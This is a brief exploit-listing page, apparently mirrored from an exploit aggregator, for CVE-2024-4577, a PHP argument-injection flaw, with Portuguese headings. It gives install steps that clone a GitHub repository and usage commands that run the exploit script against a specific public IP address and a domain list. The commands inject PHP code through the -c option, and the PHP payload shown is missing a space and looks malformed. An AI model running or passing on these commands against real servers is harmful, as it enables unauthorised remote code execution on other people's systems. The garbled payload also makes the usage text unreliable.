Exploit for CVE-2024-4577
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DIDARUL342-CVE-2024-4577
# CVE-2024-4577
Vulnerabilidade de injeção de argumentos no PHP
## INSTALAÇÃO
git clone https://github.com/didarul342/CVE-2024-4577.git
cd CVE-2024-4577
pip3 install -r requirements.txt
## USO
root@kitploit:~
# Scan A Target
python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"
# Scan a list of Targets
python3 CVE-2024-4577.py -f domains.txt -c "<?phpphpinfo();?>"